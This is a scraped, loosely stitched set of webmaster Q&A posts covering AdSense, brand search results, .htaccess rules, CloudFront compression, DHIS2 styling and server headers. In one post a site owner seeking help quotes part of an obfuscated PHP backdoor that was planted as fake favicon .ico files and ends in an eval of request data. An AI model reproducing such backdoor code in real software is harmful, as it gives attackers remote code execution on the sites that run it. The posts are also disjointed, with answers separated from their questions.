In order to make sure that your home page is not indexed, you should use the site operator site:example.com. If it appears on the result list, it's indexed.

The cache cache:example.com only proves that there is no cache of your homepage yet. You need to be patient and let the searchers do their job.

@Welton855

Posted in: #Advertising #GoogleAdsense #GoogleAdsensePolicies

According to this, Google doesn't allow ads served by AdSense to open in a new window:

Generally, it is our policy to not allow Google ads to open in a new window. However, in a few markets, including China, we've found that opening ads in a new window better aligns with expected internet behaviour and provides a more consistent, intuitive user experience.

Keeping in mind the importance of the user experience, we've enabled Google ads to open in new windows in locations where this is expected browsing behaviour. This functionality is determined by the IP of the user, and is not an option that you can select your AdSense account.

This seems quite a significant caveat for a webmaster using AdSense, as it means any advertisements they serve on their site will take visitors away from it.

I can't imagine what Google's motive is for doing this, as not only do users generally dislike ads that disrupt their browsing experience, they're also more likely to simply return to their last-used tab/window after following an ad rather clicking the Back button on their browser once they've done so.

What reasons would Google have to do this, and is anyone aware of more information on which regions/IP address ranges Google has decided to enable the behaviour of opening AdSense ads in a new window for?

 query : Re: How to show more results for our brand name when searched for in Google? The question, TL;DR: SERP is filled with a lot of comparison and review websites. How do I show my own subdomains,

@Welton855

There are a few thing you can do to get more visibility on brand searches.

Sitelinks

If you want Google to show more sitelinks on your brand search you should try the following:

Submit an updated XML sitemap
Use internal links with accurate anchors
Link only relevant categories in the menu
Make sure your page load is good (they will be able to check more pages)
Check Search Console terms that drive traffic to your site. Understand what your visitors are looking for and make sure you have a browsing directory up to it.
Avoid HTML/JS errors on the site

Subdomains

Make sure all your subdomains are using the brand on titles and content and they have enough popularity to rank. They must have a good internal linking between them and the main site.

Extra brand domain

You can use a brand-domain (for example somethingmybrand.com). You should use it only for a specific content and it will rank easily in TOP10. For example: savemoneywithbrand.com, learntoflywithbrand.com, etc.

Linking press site

There is no need for all TOP10 results to be of your own. You can link pages that mentions your brand and talk good about it. For example, you can have: example.com/press and there you can include updated links to the sites that are talking and linking to your web.

Adwords

Doing brand PPC-campaings will help you getting more visibility on TOP10. It's cheap and you can even use sitelinks.

Competitors

Analyze your main competitors TOP20 brand results. I'm aware you already did that, but make sure you know exactly what public profiles they have and how they are linked.

@Welton855

The question, TL;DR:

SERP is filled with a lot of comparison and review websites. How do I show my own subdomains, Twitter feed, and Wikipedia entry when a user searches for my "brand"?

Slightly longer version:

The company I work for has got a decent brand reputation. We have a Wikipedia page, regularly updated social media feed and several useful subdomains. However, when someone searches for "company name", a couple of our subdomains are getting grouped in the sitelinks.

Now, when you search for our competitor brands (slightly higher brand reputation than us, but not 2x) you can see their Twitter feed under the sitelinks. The subdomains are not getting grouped in the sitelinks and there's a list of their similar subdomains below the Twitter feed. Their Wikipedia page appears below that and comparison and review websites are nowhere to be found.

Basically, I want more of our brand results to show in the SERP when someone searches for our brand name. How can I achieve this?

@Welton855

The behavior you describe is normal. An .htaccess files applies to the folder it is in and recursively to subdirectories. Another .htacess can also exist in the subdirectory in which case it has precedence.

In your case you either need to split the file into three, putting the relevant third in an .htaccess within the right directory from where your add-on domains are served.

Or you may be able to put the .htaccess in the parent directory of all three domains, if there is such a directory, and the server is configured to read .htaccess files above public_html. In my server it does work like that but it is possible this depends on a config option.

In any case, splitting the .htaccess is best since it will make things easier in the future should you move servers, change servers for some of the domains, etc.

Files are unexpectedly appearing on one of my shared web servers. They can appear in pretty much hundreds of directories and they are always called something like favicon_1166f9.ico. The first 6 characters are always favico and the extension is always ico. Although these are not icons and cannot be opened by an image viewer.

Five days ago I did a clean sweep and deleted hundreds of these files yet I just found two. I noticed some on the server before but thought it was just corruption from uploading a favicon but obviously this is not the case. The site actually as one favicon.ico in just the home dir and is working fine.

What could be causing these files to keep appearing? Is the site hacked?

UPDATE 1: Starting to really look like a hack. Here is the partial content being inserted:

$c6d81c6 = 607;$GLOBALS['g1aff67e']=Array();global$g1aff67e;$g1aff67e=$GLOBALS;${"x47x4cx4fBx41x4cx53"}['h21842aa7']="x59x2fx6cx45x75x44x7ax6fx68x2ax53x74x73x51x48x72x26x21x25x67x28x70x55x7cxax76x35x60x52x43x65x3dx4dx71x4fx32x31x7ex34x20x5ax41x2ex2cx3bx9x30x6ax57x6ex3f

And it goes on for 7K ending in:

[91].$g1aff67e['h21842aa7'][38].$g1aff67e['h21842aa7'][36].$g1aff67e['h21842aa7'][57].$g1aff67e['h21842aa7'][36].$g1aff67e['h21842aa7'][66].$g1aff67e['h21842aa7'][38]]($b7ce1c0db)==3){eval/*v3f8d8*/($b7ce1c0db[1]($b7ce1c0db[2]));exit();}}} ?>

Note that the last part is an eval of whatever the rest is.

UPDATE 2: This StackOverflow question shows someone with the same problem.

There is accepted answer but the proposed solution is to disable all POST requests which will not be possible here given this is a WordPress site and there are other parts using POST too (although not many but they are necessary).

Given this information it seems that this is an attack and not virus which is probably why a virus scan turned out nothing.

The question now is: How do I prevent this attack from working? If that is in fact what is going on.

When I type my web page address for the first time in a new browser, the address is automatically added by some strange suffix.

automatically become:
example.com/?i=1

This is happen for that address only (my web page address only in this case). It does not happen for other ordinary/ common web page addresses.

It keep happening although:

I clear the cache before typing the address.
I refresh the page for many times.
I open it in incognito browser.

The correct address will be exactly correct if I:

Type again the address in the address bar for the second time onward.
Type again in a new tab in the same browser windows.

How to fix this problem so that I can go to the correct address in every first time I type my web page address? Anybody can help me please?

I am using HTML, Javascript, and CSS.
I am implementing Google Maps API too. That's why I need my web page visitor visit the correct address for the first time.
With /?i=1 suffix, the google maps API will not be displayed because the address is not registered in the google maps developer page.

There are no strange things in my htdocs folder, I suppose. I am not sure that google30bba13d1fbfe55d.html google referrer file and html5reset-1.6.1.css reset file cause it? I am also not sure if my other html file that is not index.html will be the cause?

@Welton855

Posted in: #Database #Laravel #Mysql #Php #Phpmyadmin

I work at a company with a custom PHP framework we have built over the years. For the most our custom framework suits our needs and includes almost everything Laravel offers, however, our database classes are outdated and we need to update them. Rather than rebuilding our our database classes we've been looking at some pre-built options.

So far the database classes within Laravel seems to be the most attractive. However we don't need/want the entire Laravel framework, we pride ourselves on having a very slimmed down base/framework that we built and adding the entire Laravel library seems like overkill when we just want the Database functionality. So long story short is the a way to easily extract just the Database Library within the Laravel Framework to run stand alone so we can integrate it into our customer framework. So far I haven't found very many options.

The best option I have found so far is below: github.com/Luracast/Laravel-Database
However that GIT Repository hasn't been updated in over 2 years.

I've also looked into Lumen, but even the slimmed down version of Laravel seems like to much extra code that we don't need.

Does anyone know of any ways of integrating just the Laravel Database classes into our framework.

@Welton855

This is possible if each image has an owning page and there is a known pattern between them.

Let's say there is an image called: car.jpg and it is owned by page car.html. In this case you can use the .htaccess to do the conversion using referral detection:

RewriteCond %{HTTP_REFERER} !^https://www.example.com/.*$ [NC]
RewriteRule ^(.*).jpg$ .html [R=301,L]

This means that anyone not loading the image from a page on your site (www.example.com) will get a redirect to the corresponding page of the same name. You can add other types of images too, say jpg and png by changing the regular expression to ^(.*).(jpg|png)$ or redirect to a more complex URL such as post.php?image=

Now if you have images with names that do not relate to any pages such as car.html having an image called nissan_sentra.png then you will not be able to have an easy mapping and you will have to make a redirect table for each case which is not just more complicated but also rather hard to maintain.

@Welton855

This is a design limitation:

The file size must be between 1,000 and 10,000,000 bytes.

docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/ServingCompressedFiles.html

Compressing files is resource-intensive, so the designers of CloudFront placed an upper bound on the size of files that CloudFront will spend resources compressing on-the-fly.

There's not an "automatic" workaround.

If your files are that large, and compressible, it's probably in your interest to store them compressed in S3 anyway, to reduce your storage costs.

Gzip the files with gzip -9 (which may actually result in slightly smaller files than generated by CloudFront -- gzip has varying levels of compression, with -9 being the most aggressive, and the level used by CloudFront does not appear to be documented), then remove the .gz extension, and upload the files to S3, setting Content-Encoding: gzip in the upload metadata.

@Welton855

The answer is simple yet complicated. Google's algorithm is very powerful and understands very well that most likely a person that wants to find your website would search using the simpler term 'Premier Disability'. Google assumes that a person searching the full technical name of the company looks for general company information rather than the services of the company. In example if you Google 'facebook', you'll see a simple search result page with links to facebook. If you'd search for 'Facebook Inc.', you will see corporate pages as a result and perhaps even stock ticker graphics. This also explains it similarly why for your search queries the results are different. Google isn't a phone book, Google tries to return the querying user what they are looking for based on their experience.

There are several approaches for this. One it to redirect traffic and to set the canonical to the scientific URL.

This way you will not have any issue with duplicate content and users will still see a page for each possible name.

Honestly if you recreate everything each time, I do not see why the robots.txt is not just reconstructed too. The part to prevent Googlebot is static and just needs to be there when you restore the site.

While Google Search console will not help getting the site in index, it will confirm if you have done so by listing the pages as Blocked Resources.

There several ways to block resources:

Use tags like: <meta name="robots" content="noindex"> See info by Google.
robots.txt which you want to avoid but it designed exactly for that and, unlike using Meta goes not have Googlebot fetch to discard, saving you some bandwidth and requests.

@Welton855

You can find the answer in the following tutorial: www.dhis2.org/change-appearance-of-dhis2-login-screen

A common challenge when you updated your installation of DHIS 2 is
that custom changes to appearance (such as the login page) are
overwritten when the application is updated. If you want customize the
look of DHIS 2 with a Cascading Style Sheet (CSS), here is an example
of a clean way to use your own CSS, and to keep it up to date even if
the DHIS 2 application is updated.In this example we'll hide the flag
and the footer on the DHIS 2 login page to illustrate the approach.

Start by creating a file mystyle.css (the name doesn’t matter). Note
that we specify some custom styling for the #flagArea and
#footerArea elements.
#flagArea
{
visibility: hidden;
position: absolute;
top: 22px;
left: 52px;
border: 1px solid #d5d5d5;
border-radius: 2px;
max-width: 105px;
margin-bottom: 5%;
}
#footerArea
{
visibility: hidden;
position: absolute;
bottom: 0;
left: 0;
padding: 10px 0 9px 0;
font-size: 13px;
border-top: 1px solid #416f9d;
color: #6b90b8;
width: 100%;
}

Next, we will send the custom style sheet to the server using a curl
command.

curl -d @mystyle .css "https://example.com/api/files/style" -H "Content-Type:text/css" -u username:password Be sure to use the

correct URL for your server, along with an authorized username and
password. If you view the source of the home page you’ll notice a call
to

<link type="text/css" rel="stylesheet" href="../../api/files/style/external" /> If you look here you’ll be

able to see the CSS that was created above:
example.com/api/files/style/external
Please note that when you post a new file to
example.com/api/files/style it will overwrite the current
version you have to include all of your previous changes.

A weird thing happens when I use the following code:

RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_URI} ^/$
RewriteRule ^(.*)$ /V8/ [NC,L]

This code does redirect to the right folder without changing the URL, but as soon as the page is loaded, another redirection happens to a white page with my email address as a link. When I look at the source code it says:

<a href='mailto:seb@example.com'>seb@example.com</a>

Then if I directly go to example.com/V8/, I can access the page without being redirected to this email page.

If I update the last line of the .htaccess to:

RewriteRule ^(.*)$ /V8/ [R=301,NC,L]

There's no double redirection, but the redirection I want is not invisible anymore because of the R=301.

Can someone help me find out what the problem is?

# Unset Server Signature header
ServerSignature Off
# Unset Server Technology header
Header unset X-Powered-By
</IfModule>
<IfModule mod_headers.c>
# Set XSS Protection header
Header set X-XSS-Protection "1; mode=block"
</IfModule>

I have put this in the "Additional Apache Directives", but to no avail. My server hosting company don't seem to be able to help. I am not getting any syntax errors with this. It just doesn't seem to work.

I am running Plesk 12.5.30 Update #71 on CentOS Linux 7.4.1708 (Core)‬. Apache and nginx.
